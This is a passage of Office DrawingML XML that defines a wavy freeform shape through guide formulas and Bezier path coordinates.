                <a:gd name="connsiteX1" fmla="*/ 12192000 w 12192000"/>
                <a:gd name="connsiteY1" fmla="*/ 463429 h 1203824"/>
                <a:gd name="connsiteX2" fmla="*/ 12190876 w 12192000"/>
                <a:gd name="connsiteY2" fmla="*/ 463512 h 1203824"/>
                <a:gd name="connsiteX3" fmla="*/ 12077245 w 12192000"/>
                <a:gd name="connsiteY3" fmla="*/ 476327 h 1203824"/>
                <a:gd name="connsiteX4" fmla="*/ 11984517 w 12192000"/>
                <a:gd name="connsiteY4" fmla="*/ 479927 h 1203824"/>
                <a:gd name="connsiteX5" fmla="*/ 11951600 w 12192000"/>
                <a:gd name="connsiteY5" fmla="*/ 478957 h 1203824"/>
                <a:gd name="connsiteX6" fmla="*/ 11690904 w 12192000"/>
                <a:gd name="connsiteY6" fmla="*/ 471970 h 1203824"/>
                <a:gd name="connsiteX7" fmla="*/ 11413965 w 12192000"/>
                <a:gd name="connsiteY7" fmla="*/ 476172 h 1203824"/>
                <a:gd name="connsiteX8" fmla="*/ 11240739 w 12192000"/>
                <a:gd name="connsiteY8" fmla="*/ 523169 h 1203824"/>
                <a:gd name="connsiteX9" fmla="*/ 11175005 w 12192000"/>
                <a:gd name="connsiteY9" fmla="*/ 532169 h 1203824"/>
                <a:gd name="connsiteX10" fmla="*/ 10873726 w 12192000"/>
                <a:gd name="connsiteY10" fmla="*/ 580253 h 1203824"/>
                <a:gd name="connsiteX11" fmla="*/ 10821306 w 12192000"/>
                <a:gd name="connsiteY11" fmla="*/ 593207 h 1203824"/>
                <a:gd name="connsiteX12" fmla="*/ 10530811 w 12192000"/>
                <a:gd name="connsiteY12" fmla="*/ 612184 h 1203824"/>
                <a:gd name="connsiteX13" fmla="*/ 10426049 w 12192000"/>
                <a:gd name="connsiteY13" fmla="*/ 623354 h 1203824"/>
                <a:gd name="connsiteX14" fmla="*/ 10329156 w 12192000"/>
                <a:gd name="connsiteY14" fmla="*/ 630948 h 1203824"/>
                <a:gd name="connsiteX15" fmla="*/ 10194727 w 12192000"/>
                <a:gd name="connsiteY15" fmla="*/ 648617 h 1203824"/>
                <a:gd name="connsiteX16" fmla="*/ 10055906 w 12192000"/>
                <a:gd name="connsiteY16" fmla="*/ 671256 h 1203824"/>
                <a:gd name="connsiteX17" fmla="*/ 9900551 w 12192000"/>
                <a:gd name="connsiteY17" fmla="*/ 692855 h 1203824"/>
                <a:gd name="connsiteX18" fmla="*/ 9838464 w 12192000"/>
                <a:gd name="connsiteY18" fmla="*/ 696804 h 1203824"/>
                <a:gd name="connsiteX19" fmla="*/ 9672957 w 12192000"/>
                <a:gd name="connsiteY19" fmla="*/ 723816 h 1203824"/>
                <a:gd name="connsiteX20" fmla="*/ 9585066 w 12192000"/>
                <a:gd name="connsiteY20" fmla="*/ 730692 h 1203824"/>
                <a:gd name="connsiteX21" fmla="*/ 9441407 w 12192000"/>
                <a:gd name="connsiteY21" fmla="*/ 750055 h 1203824"/>
                <a:gd name="connsiteX22" fmla="*/ 9394459 w 12192000"/>
                <a:gd name="connsiteY22" fmla="*/ 755431 h 1203824"/>
                <a:gd name="connsiteX23" fmla="*/ 9352590 w 12192000"/>
                <a:gd name="connsiteY23" fmla="*/ 760650 h 1203824"/>
                <a:gd name="connsiteX24" fmla="*/ 9211614 w 12192000"/>
                <a:gd name="connsiteY24" fmla="*/ 796248 h 1203824"/>
                <a:gd name="connsiteX25" fmla="*/ 9084667 w 12192000"/>
                <a:gd name="connsiteY25" fmla="*/ 815303 h 1203824"/>
                <a:gd name="connsiteX26" fmla="*/ 8863666 w 12192000"/>
                <a:gd name="connsiteY26" fmla="*/ 859298 h 1203824"/>
                <a:gd name="connsiteX27" fmla="*/ 8813796 w 12192000"/>
                <a:gd name="connsiteY27" fmla="*/ 862070 h 1203824"/>
                <a:gd name="connsiteX28" fmla="*/ 8659351 w 12192000"/>
                <a:gd name="connsiteY28" fmla="*/ 882406 h 1203824"/>
                <a:gd name="connsiteX29" fmla="*/ 8571352 w 12192000"/>
                <a:gd name="connsiteY29" fmla="*/ 893639 h 1203824"/>
                <a:gd name="connsiteX30" fmla="*/ 8464106 w 12192000"/>
                <a:gd name="connsiteY30" fmla="*/ 918004 h 1203824"/>
                <a:gd name="connsiteX31" fmla="*/ 8278324 w 12192000"/>
                <a:gd name="connsiteY31" fmla="*/ 963769 h 1203824"/>
                <a:gd name="connsiteX32" fmla="*/ 8229128 w 12192000"/>
                <a:gd name="connsiteY32" fmla="*/ 973810 h 1203824"/>
                <a:gd name="connsiteX33" fmla="*/ 8139751 w 12192000"/>
                <a:gd name="connsiteY33" fmla="*/ 995815 h 1203824"/>
                <a:gd name="connsiteX34" fmla="*/ 8123571 w 12192000"/>
                <a:gd name="connsiteY34" fmla="*/ 999822 h 1203824"/>
                <a:gd name="connsiteX35" fmla="*/ 7988699 w 12192000"/>
                <a:gd name="connsiteY35" fmla="*/ 1042479 h 1203824"/>
                <a:gd name="connsiteX36" fmla="*/ 7917214 w 12192000"/>
                <a:gd name="connsiteY36" fmla="*/ 1054565 h 1203824"/>
                <a:gd name="connsiteX37" fmla="*/ 7710915 w 12192000"/>
                <a:gd name="connsiteY37" fmla="*/ 1084190 h 1203824"/>
                <a:gd name="connsiteX38" fmla="*/ 7622959 w 12192000"/>
                <a:gd name="connsiteY38" fmla="*/ 1093150 h 1203824"/>
                <a:gd name="connsiteX39" fmla="*/ 7410782 w 12192000"/>
                <a:gd name="connsiteY39" fmla="*/ 1109640 h 1203824"/>
                <a:gd name="connsiteX40" fmla="*/ 7277754 w 12192000"/>
                <a:gd name="connsiteY40" fmla="*/ 1121822 h 1203824"/>
                <a:gd name="connsiteX41" fmla="*/ 7124540 w 12192000"/>
                <a:gd name="connsiteY41" fmla="*/ 1132918 h 1203824"/>
                <a:gd name="connsiteX42" fmla="*/ 6949752 w 12192000"/>
                <a:gd name="connsiteY42" fmla="*/ 1151058 h 1203824"/>
                <a:gd name="connsiteX43" fmla="*/ 6630249 w 12192000"/>
                <a:gd name="connsiteY43" fmla="*/ 1176063 h 1203824"/>
                <a:gd name="connsiteX44" fmla="*/ 6320634 w 12192000"/>
                <a:gd name="connsiteY44" fmla="*/ 1198901 h 1203824"/>
                <a:gd name="connsiteX45" fmla="*/ 6192343 w 12192000"/>
                <a:gd name="connsiteY45" fmla="*/ 1198323 h 1203824"/>
                <a:gd name="connsiteX46" fmla="*/ 5966562 w 12192000"/>
                <a:gd name="connsiteY46" fmla="*/ 1203723 h 1203824"/>
                <a:gd name="connsiteX47" fmla="*/ 5867227 w 12192000"/>
                <a:gd name="connsiteY47" fmla="*/ 1201847 h 1203824"/>
                <a:gd name="connsiteX48" fmla="*/ 5630172 w 12192000"/>
                <a:gd name="connsiteY48" fmla="*/ 1202248 h 1203824"/>
                <a:gd name="connsiteX49" fmla="*/ 5348949 w 12192000"/>
                <a:gd name="connsiteY49" fmla="*/ 1191768 h 1203824"/>
                <a:gd name="connsiteX50" fmla="*/ 5241228 w 12192000"/>
                <a:gd name="connsiteY50" fmla="*/ 1192408 h 1203824"/>
                <a:gd name="connsiteX51" fmla="*/ 4971133 w 12192000"/>
                <a:gd name="connsiteY51" fmla="*/ 1193559 h 1203824"/>
                <a:gd name="connsiteX52" fmla="*/ 4869416 w 12192000"/>
                <a:gd name="connsiteY52" fmla="*/ 1200519 h 1203824"/>
                <a:gd name="connsiteX53" fmla="*/ 4753274 w 12192000"/>
                <a:gd name="connsiteY53" fmla="*/ 1200850 h 1203824"/>
                <a:gd name="connsiteX54" fmla="*/ 4611883 w 12192000"/>
                <a:gd name="connsiteY54" fmla="*/ 1192701 h 1203824"/>
                <a:gd name="connsiteX55" fmla="*/ 4376825 w 12192000"/>
                <a:gd name="connsiteY55" fmla="*/ 1184131 h 1203824"/>
                <a:gd name="connsiteX56" fmla="*/ 4285471 w 12192000"/>
                <a:gd name="connsiteY56" fmla="*/ 1187158 h 1203824"/>
                <a:gd name="connsiteX57" fmla="*/ 3866543 w 12192000"/>
                <a:gd name="connsiteY57" fmla="*/ 1181596 h 1203824"/>
                <a:gd name="connsiteX58" fmla="*/ 3651342 w 12192000"/>
                <a:gd name="connsiteY58" fmla="*/ 1174348 h 1203824"/>
                <a:gd name="connsiteX59" fmla="*/ 3518453 w 12192000"/>
                <a:gd name="connsiteY59" fmla="*/ 1177258 h 1203824"/>
                <a:gd name="connsiteX60" fmla="*/ 3400818 w 12192000"/>
                <a:gd name="connsiteY60" fmla="*/ 1169685 h 1203824"/>
                <a:gd name="connsiteX61" fmla="*/ 3037154 w 12192000"/>
                <a:gd name="connsiteY61" fmla="*/ 1153217 h 1203824"/>
                <a:gd name="connsiteX62" fmla="*/ 2866260 w 12192000"/>
                <a:gd name="connsiteY62" fmla="*/ 1132283 h 1203824"/>
                <a:gd name="connsiteX63" fmla="*/ 2582173 w 12192000"/>
                <a:gd name="connsiteY63" fmla="*/ 1088979 h 1203824"/>
                <a:gd name="connsiteX64" fmla="*/ 2395406 w 12192000"/>
                <a:gd name="connsiteY64" fmla="*/ 1035945 h 1203824"/>
                <a:gd name="connsiteX65" fmla="*/ 2294751 w 12192000"/>
                <a:gd name="connsiteY65" fmla="*/ 1014618 h 1203824"/>
                <a:gd name="connsiteX66" fmla="*/ 2122944 w 12192000"/>
                <a:gd name="connsiteY66" fmla="*/ 984751 h 1203824"/>
                <a:gd name="connsiteX67" fmla="*/ 1905504 w 12192000"/>
                <a:gd name="connsiteY67" fmla="*/ 941380 h 1203824"/>
                <a:gd name="connsiteX68" fmla="*/ 1671045 w 12192000"/>
                <a:gd name="connsiteY68" fmla="*/ 924228 h 1203824"/>
                <a:gd name="connsiteX69" fmla="*/ 1543856 w 12192000"/>
                <a:gd name="connsiteY69" fmla="*/ 898190 h 1203824"/>
                <a:gd name="connsiteX70" fmla="*/ 1419784 w 12192000"/>
                <a:gd name="connsiteY70" fmla="*/ 868500 h 1203824"/>
                <a:gd name="connsiteX71" fmla="*/ 1355116 w 12192000"/>
                <a:gd name="connsiteY71" fmla="*/ 849214 h 1203824"/>
                <a:gd name="connsiteX72" fmla="*/ 1223713 w 12192000"/>
                <a:gd name="connsiteY72" fmla="*/ 821702 h 1203824"/>
                <a:gd name="connsiteX73" fmla="*/ 1094193 w 12192000"/>
                <a:gd name="connsiteY73" fmla="*/ 804872 h 1203824"/>
                <a:gd name="connsiteX74" fmla="*/ 1001115 w 12192000"/>
                <a:gd name="connsiteY74" fmla="*/ 783030 h 1203824"/>
                <a:gd name="connsiteX75" fmla="*/ 879548 w 12192000"/>
                <a:gd name="connsiteY75" fmla="*/ 747884 h 1203824"/>
                <a:gd name="connsiteX76" fmla="*/ 711163 w 12192000"/>
                <a:gd name="connsiteY76" fmla="*/ 719039 h 1203824"/>
                <a:gd name="connsiteX77" fmla="*/ 557941 w 12192000"/>
                <a:gd name="connsiteY77" fmla="*/ 707101 h 1203824"/>
                <a:gd name="connsiteX78" fmla="*/ 480347 w 12192000"/>
                <a:gd name="connsiteY78" fmla="*/ 668702 h 1203824"/>
                <a:gd name="connsiteX79" fmla="*/ 296224 w 12192000"/>
                <a:gd name="connsiteY79" fmla="*/ 603583 h 1203824"/>
                <a:gd name="connsiteX80" fmla="*/ 72689 w 12192000"/>
                <a:gd name="connsiteY80" fmla="*/ 560892 h 1203824"/>
                <a:gd name="connsiteX81" fmla="*/ 0 w 12192000"/>
                <a:gd name="connsiteY81" fmla="*/ 543486 h 1203824"/>
                <a:gd name="connsiteX82" fmla="*/ 0 w 12192000"/>
                <a:gd name="connsiteY82" fmla="*/ 384357 h 1203824"/>
                <a:gd name="connsiteX83" fmla="*/ 51784 w 12192000"/>
                <a:gd name="connsiteY83" fmla="*/ 393937 h 1203824"/>
                <a:gd name="connsiteX84" fmla="*/ 205561 w 12192000"/>
                <a:gd name="connsiteY84" fmla="*/ 414859 h 1203824"/>
                <a:gd name="connsiteX85" fmla="*/ 354391 w 12192000"/>
                <a:gd name="connsiteY85" fmla="*/ 426667 h 1203824"/>
                <a:gd name="connsiteX86" fmla="*/ 448281 w 12192000"/>
                <a:gd name="connsiteY86" fmla="*/ 436308 h 1203824"/>
                <a:gd name="connsiteX87" fmla="*/ 611518 w 12192000"/>
                <a:gd name="connsiteY87" fmla="*/ 434166 h 1203824"/>
                <a:gd name="connsiteX88" fmla="*/ 746076 w 12192000"/>
                <a:gd name="connsiteY88" fmla="*/ 422520 h 1203824"/>
                <a:gd name="connsiteX89" fmla="*/ 902724 w 12192000"/>
                <a:gd name="connsiteY89" fmla="*/ 409989 h 1203824"/>
                <a:gd name="connsiteX90" fmla="*/ 1113854 w 12192000"/>
                <a:gd name="connsiteY90" fmla="*/ 414230 h 1203824"/>
                <a:gd name="connsiteX91" fmla="*/ 1333449 w 12192000"/>
                <a:gd name="connsiteY91" fmla="*/ 459938 h 1203824"/>
                <a:gd name="connsiteX92" fmla="*/ 1408608 w 12192000"/>
                <a:gd name="connsiteY92" fmla="*/ 458278 h 1203824"/>
                <a:gd name="connsiteX93" fmla="*/ 1630191 w 12192000"/>
                <a:gd name="connsiteY93" fmla="*/ 403061 h 1203824"/>
                <a:gd name="connsiteX94" fmla="*/ 1956289 w 12192000"/>
                <a:gd name="connsiteY94" fmla="*/ 332366 h 1203824"/>
                <a:gd name="connsiteX95" fmla="*/ 2042814 w 12192000"/>
                <a:gd name="connsiteY95" fmla="*/ 344002 h 1203824"/>
                <a:gd name="connsiteX96" fmla="*/ 2183420 w 12192000"/>
                <a:gd name="connsiteY96" fmla="*/ 369635 h 1203824"/>
                <a:gd name="connsiteX97" fmla="*/ 2269566 w 12192000"/>
                <a:gd name="connsiteY97" fmla="*/ 439859 h 1203824"/>
                <a:gd name="connsiteX98" fmla="*/ 2331129 w 12192000"/>
                <a:gd name="connsiteY98" fmla="*/ 524163 h 1203824"/>
                <a:gd name="connsiteX99" fmla="*/ 2385112 w 12192000"/>
                <a:gd name="connsiteY99" fmla="*/ 555357 h 1203824"/>
                <a:gd name="connsiteX100" fmla="*/ 2444033 w 12192000"/>
                <a:gd name="connsiteY100" fmla="*/ 572629 h 1203824"/>
                <a:gd name="connsiteX101" fmla="*/ 2525979 w 12192000"/>
                <a:gd name="connsiteY101" fmla="*/ 603233 h 1203824"/>
                <a:gd name="connsiteX102" fmla="*/ 2603911 w 12192000"/>
                <a:gd name="connsiteY102" fmla="*/ 684825 h 1203824"/>
                <a:gd name="connsiteX103" fmla="*/ 2678828 w 12192000"/>
                <a:gd name="connsiteY103" fmla="*/ 706990 h 1203824"/>
                <a:gd name="connsiteX104" fmla="*/ 2738094 w 12192000"/>
                <a:gd name="connsiteY104" fmla="*/ 711376 h 1203824"/>
                <a:gd name="connsiteX105" fmla="*/ 2983806 w 12192000"/>
                <a:gd name="connsiteY105" fmla="*/ 728243 h 1203824"/>
                <a:gd name="connsiteX106" fmla="*/ 3013997 w 12192000"/>
                <a:gd name="connsiteY106" fmla="*/ 725446 h 1203824"/>
                <a:gd name="connsiteX107" fmla="*/ 3364419 w 12192000"/>
                <a:gd name="connsiteY107" fmla="*/ 720577 h 1203824"/>
                <a:gd name="connsiteX108" fmla="*/ 3460521 w 12192000"/>
                <a:gd name="connsiteY108" fmla="*/ 717628 h 1203824"/>
                <a:gd name="connsiteX109" fmla="*/ 3710982 w 12192000"/>
                <a:gd name="connsiteY109" fmla="*/ 714182 h 1203824"/>
                <a:gd name="connsiteX110" fmla="*/ 3850961 w 12192000"/>
                <a:gd name="connsiteY110" fmla="*/ 778802 h 1203824"/>
                <a:gd name="connsiteX111" fmla="*/ 3946286 w 12192000"/>
                <a:gd name="connsiteY111" fmla="*/ 816372 h 1203824"/>
                <a:gd name="connsiteX112" fmla="*/ 4065132 w 12192000"/>
                <a:gd name="connsiteY112" fmla="*/ 832459 h 1203824"/>
                <a:gd name="connsiteX113" fmla="*/ 4132173 w 12192000"/>
                <a:gd name="connsiteY113" fmla="*/ 835167 h 1203824"/>
                <a:gd name="connsiteX114" fmla="*/ 4305858 w 12192000"/>
                <a:gd name="connsiteY114" fmla="*/ 804156 h 1203824"/>
                <a:gd name="connsiteX115" fmla="*/ 4382131 w 12192000"/>
                <a:gd name="connsiteY115" fmla="*/ 769481 h 1203824"/>
                <a:gd name="connsiteX116" fmla="*/ 4453289 w 12192000"/>
                <a:gd name="connsiteY116" fmla="*/ 752531 h 1203824"/>
                <a:gd name="connsiteX117" fmla="*/ 4657971 w 12192000"/>
                <a:gd name="connsiteY117" fmla="*/ 795835 h 1203824"/>
                <a:gd name="connsiteX118" fmla="*/ 4682399 w 12192000"/>
                <a:gd name="connsiteY118" fmla="*/ 813876 h 1203824"/>
                <a:gd name="connsiteX119" fmla="*/ 4771814 w 12192000"/>
                <a:gd name="connsiteY119" fmla="*/ 907046 h 1203824"/>
                <a:gd name="connsiteX120" fmla="*/ 4827520 w 12192000"/>
                <a:gd name="connsiteY120" fmla="*/ 929876 h 1203824"/>
                <a:gd name="connsiteX121" fmla="*/ 4849942 w 12192000"/>
                <a:gd name="connsiteY121" fmla="*/ 933851 h 1203824"/>
                <a:gd name="connsiteX122" fmla="*/ 5009626 w 12192000"/>
                <a:gd name="connsiteY122" fmla="*/ 957896 h 1203824"/>
                <a:gd name="connsiteX123" fmla="*/ 5158711 w 12192000"/>
                <a:gd name="connsiteY123" fmla="*/ 963814 h 1203824"/>
                <a:gd name="connsiteX124" fmla="*/ 5376427 w 12192000"/>
                <a:gd name="connsiteY124" fmla="*/ 963151 h 1203824"/>
                <a:gd name="connsiteX125" fmla="*/ 5475787 w 12192000"/>
                <a:gd name="connsiteY125" fmla="*/ 980508 h 1203824"/>
                <a:gd name="connsiteX126" fmla="*/ 5653401 w 12192000"/>
                <a:gd name="connsiteY126" fmla="*/ 987268 h 1203824"/>
                <a:gd name="connsiteX127" fmla="*/ 5726340 w 12192000"/>
                <a:gd name="connsiteY127" fmla="*/ 985357 h 1203824"/>
                <a:gd name="connsiteX128" fmla="*/ 5790563 w 12192000"/>
                <a:gd name="connsiteY128" fmla="*/ 991300 h 1203824"/>
                <a:gd name="connsiteX129" fmla="*/ 5860260 w 12192000"/>
                <a:gd name="connsiteY129" fmla="*/ 1004958 h 1203824"/>
                <a:gd name="connsiteX130" fmla="*/ 6042101 w 12192000"/>
                <a:gd name="connsiteY130" fmla="*/ 1036226 h 1203824"/>
                <a:gd name="connsiteX131" fmla="*/ 6301998 w 12192000"/>
                <a:gd name="connsiteY131" fmla="*/ 989138 h 1203824"/>
                <a:gd name="connsiteX132" fmla="*/ 6452025 w 12192000"/>
                <a:gd name="connsiteY132" fmla="*/ 968489 h 1203824"/>
                <a:gd name="connsiteX133" fmla="*/ 6589205 w 12192000"/>
                <a:gd name="connsiteY133" fmla="*/ 939474 h 1203824"/>
                <a:gd name="connsiteX134" fmla="*/ 6631069 w 12192000"/>
                <a:gd name="connsiteY134" fmla="*/ 911222 h 1203824"/>
                <a:gd name="connsiteX135" fmla="*/ 6828274 w 12192000"/>
                <a:gd name="connsiteY135" fmla="*/ 942941 h 1203824"/>
                <a:gd name="connsiteX136" fmla="*/ 6900803 w 12192000"/>
                <a:gd name="connsiteY136" fmla="*/ 984140 h 1203824"/>
                <a:gd name="connsiteX137" fmla="*/ 7034668 w 12192000"/>
                <a:gd name="connsiteY137" fmla="*/ 1018665 h 1203824"/>
                <a:gd name="connsiteX138" fmla="*/ 7281067 w 12192000"/>
                <a:gd name="connsiteY138" fmla="*/ 966327 h 1203824"/>
                <a:gd name="connsiteX139" fmla="*/ 7412780 w 12192000"/>
                <a:gd name="connsiteY139" fmla="*/ 909206 h 1203824"/>
                <a:gd name="connsiteX140" fmla="*/ 7500327 w 12192000"/>
                <a:gd name="connsiteY140" fmla="*/ 894826 h 1203824"/>
                <a:gd name="connsiteX141" fmla="*/ 7662324 w 12192000"/>
                <a:gd name="connsiteY141" fmla="*/ 927415 h 1203824"/>
                <a:gd name="connsiteX142" fmla="*/ 7725334 w 12192000"/>
                <a:gd name="connsiteY142" fmla="*/ 924844 h 1203824"/>
                <a:gd name="connsiteX143" fmla="*/ 7833279 w 12192000"/>
                <a:gd name="connsiteY143" fmla="*/ 913031 h 1203824"/>
                <a:gd name="connsiteX144" fmla="*/ 7928605 w 12192000"/>
                <a:gd name="connsiteY144" fmla="*/ 881683 h 1203824"/>
                <a:gd name="connsiteX145" fmla="*/ 8146597 w 12192000"/>
                <a:gd name="connsiteY145" fmla="*/ 762968 h 1203824"/>
                <a:gd name="connsiteX146" fmla="*/ 8183577 w 12192000"/>
                <a:gd name="connsiteY146" fmla="*/ 749005 h 1203824"/>
                <a:gd name="connsiteX147" fmla="*/ 8250224 w 12192000"/>
                <a:gd name="connsiteY147" fmla="*/ 733642 h 1203824"/>
                <a:gd name="connsiteX148" fmla="*/ 8505929 w 12192000"/>
                <a:gd name="connsiteY148" fmla="*/ 626542 h 1203824"/>
                <a:gd name="connsiteX149" fmla="*/ 8564194 w 12192000"/>
                <a:gd name="connsiteY149" fmla="*/ 618796 h 1203824"/>
                <a:gd name="connsiteX150" fmla="*/ 8660705 w 12192000"/>
                <a:gd name="connsiteY150" fmla="*/ 611069 h 1203824"/>
                <a:gd name="connsiteX151" fmla="*/ 8762255 w 12192000"/>
                <a:gd name="connsiteY151" fmla="*/ 585060 h 1203824"/>
                <a:gd name="connsiteX152" fmla="*/ 8836439 w 12192000"/>
                <a:gd name="connsiteY152" fmla="*/ 566358 h 1203824"/>
                <a:gd name="connsiteX153" fmla="*/ 9050728 w 12192000"/>
                <a:gd name="connsiteY153" fmla="*/ 559575 h 1203824"/>
                <a:gd name="connsiteX154" fmla="*/ 9229627 w 12192000"/>
                <a:gd name="connsiteY154" fmla="*/ 557464 h 1203824"/>
                <a:gd name="connsiteX155" fmla="*/ 9253451 w 12192000"/>
                <a:gd name="connsiteY155" fmla="*/ 550855 h 1203824"/>
                <a:gd name="connsiteX156" fmla="*/ 9484214 w 12192000"/>
                <a:gd name="connsiteY156" fmla="*/ 498671 h 1203824"/>
                <a:gd name="connsiteX157" fmla="*/ 9582633 w 12192000"/>
                <a:gd name="connsiteY157" fmla="*/ 458384 h 1203824"/>
                <a:gd name="connsiteX158" fmla="*/ 9719670 w 12192000"/>
                <a:gd name="connsiteY158" fmla="*/ 415607 h 1203824"/>
                <a:gd name="connsiteX159" fmla="*/ 9871784 w 12192000"/>
                <a:gd name="connsiteY159" fmla="*/ 366147 h 1203824"/>
                <a:gd name="connsiteX160" fmla="*/ 9984494 w 12192000"/>
                <a:gd name="connsiteY160" fmla="*/ 336660 h 1203824"/>
                <a:gd name="connsiteX161" fmla="*/ 10154708 w 12192000"/>
                <a:gd name="connsiteY161" fmla="*/ 322193 h 1203824"/>
                <a:gd name="connsiteX162" fmla="*/ 10190446 w 12192000"/>
                <a:gd name="connsiteY162" fmla="*/ 325025 h 1203824"/>
                <a:gd name="connsiteX163" fmla="*/ 10530736 w 12192000"/>
                <a:gd name="connsiteY163" fmla="*/ 335953 h 1203824"/>
                <a:gd name="connsiteX164" fmla="*/ 10752157 w 12192000"/>
                <a:gd name="connsiteY164" fmla="*/ 305117 h 1203824"/>
                <a:gd name="connsiteX165" fmla="*/ 10824452 w 12192000"/>
                <a:gd name="connsiteY165" fmla="*/ 285927 h 1203824"/>
                <a:gd name="connsiteX166" fmla="*/ 10953152 w 12192000"/>
                <a:gd name="connsiteY166" fmla="*/ 228102 h 1203824"/>
                <a:gd name="connsiteX167" fmla="*/ 11011614 w 12192000"/>
                <a:gd name="connsiteY167" fmla="*/ 214096 h 1203824"/>
                <a:gd name="connsiteX168" fmla="*/ 11116031 w 12192000"/>
                <a:gd name="connsiteY168" fmla="*/ 195421 h 1203824"/>
                <a:gd name="connsiteX169" fmla="*/ 11344303 w 12192000"/>
                <a:gd name="connsiteY169" fmla="*/ 166629 h 1203824"/>
                <a:gd name="connsiteX170" fmla="*/ 11639050 w 12192000"/>
                <a:gd name="connsiteY170" fmla="*/ 108526 h 1203824"/>
                <a:gd name="connsiteX171" fmla="*/ 11757532 w 12192000"/>
                <a:gd name="connsiteY171" fmla="*/ 96530 h 1203824"/>
                <a:gd name="connsiteX172" fmla="*/ 11885799 w 12192000"/>
                <a:gd name="connsiteY172" fmla="*/ 86728 h 1203824"/>
                <a:gd name="connsiteX173" fmla="*/ 11922874 w 12192000"/>
                <a:gd name="connsiteY173" fmla="*/ 81060 h 1203824"/>
                <a:gd name="connsiteX174" fmla="*/ 12115331 w 12192000"/>
                <a:gd name="connsiteY174" fmla="*/ 33587 h 1203824"/>
                <a:gd name="connsiteX175" fmla="*/ 12158080 w 12192000"/>
                <a:gd name="connsiteY175" fmla="*/ 14081 h 1203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</a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12192000" h="1203824">
                  <a:moveTo>
                    <a:pt x="12192000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12192000" y="463429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12190876" y="463512"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12153133" y="467010"/>
                    <a:pt x="12115042" y="473200"/>
                    <a:pt x="12077245" y="476327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12046307" y="479040"/>
                    <a:pt x="12015359" y="479114"/>
                    <a:pt x="11984517" y="479927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11973265" y="480210"/>
                    <a:pt x="11961485" y="476792"/>
                    <a:pt x="11951600" y="478957"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11853497" y="501074"/>
                    <a:pt x="11777036" y="475730"/>
                    <a:pt x="11690904" y="471970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11600358" y="467893"/>
                    <a:pt x="11511400" y="454530"/>
                    <a:pt x="11413965" y="476172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11355010" y="489304"/>
                    <a:pt x="11299073" y="508237"/>
                    <a:pt x="11240739" y="523169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11219994" y="528395"/>
                    <a:pt x="11196384" y="531385"/>
                    <a:pt x="11175005" y="532169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11071819" y="536506"/>
                    <a:pt x="10971303" y="549336"/>
                    <a:pt x="10873726" y="580253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10856992" y="585473"/>
                    <a:pt x="10839156" y="590660"/>
                    <a:pt x="10821306" y="593207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10723500" y="607162"/>
                    <a:pt x="10626924" y="616976"/>
                    <a:pt x="10530811" y="612184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10498527" y="610559"/>
                    <a:pt x="10460885" y="619895"/>
                    <a:pt x="10426049" y="623354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10393740" y="626644"/>
                    <a:pt x="10360820" y="630774"/>
                    <a:pt x="10329156" y="630948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10282924" y="631125"/>
                    <a:pt x="10240698" y="636395"/>
                    <a:pt x="10194727" y="648617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10150847" y="660165"/>
                    <a:pt x="10102287" y="664450"/>
                    <a:pt x="10055906" y="671256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10004174" y="678826"/>
                    <a:pt x="9952442" y="686395"/>
                    <a:pt x="9900551" y="692855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9879793" y="695439"/>
                    <a:pt x="9855180" y="691398"/>
                    <a:pt x="9838464" y="696804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9784563" y="714690"/>
                    <a:pt x="9727517" y="710557"/>
                    <a:pt x="9672957" y="723816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9646220" y="730464"/>
                    <a:pt x="9614440" y="727257"/>
                    <a:pt x="9585066" y="730692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9537047" y="736221"/>
                    <a:pt x="9489294" y="743601"/>
                    <a:pt x="9441407" y="750055"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9425674" y="752111"/>
                    <a:pt x="9410218" y="753561"/>
                    <a:pt x="9394459" y="755431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9380484" y="757048"/>
                    <a:pt x="9365611" y="757472"/>
                    <a:pt x="9352590" y="760650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9305415" y="772102"/>
                    <a:pt x="9259379" y="786411"/>
                    <a:pt x="9211614" y="796248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9170220" y="804796"/>
                    <a:pt x="9126523" y="807444"/>
                    <a:pt x="9084667" y="815303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9010868" y="829042"/>
                    <a:pt x="8937412" y="845188"/>
                    <a:pt x="8863666" y="859298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8847706" y="862330"/>
                    <a:pt x="8830271" y="860096"/>
                    <a:pt x="8813796" y="862070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8762262" y="868479"/>
                    <a:pt x="8710833" y="875626"/>
                    <a:pt x="8659351" y="882406"/>
                  </a:cubicBezTo>
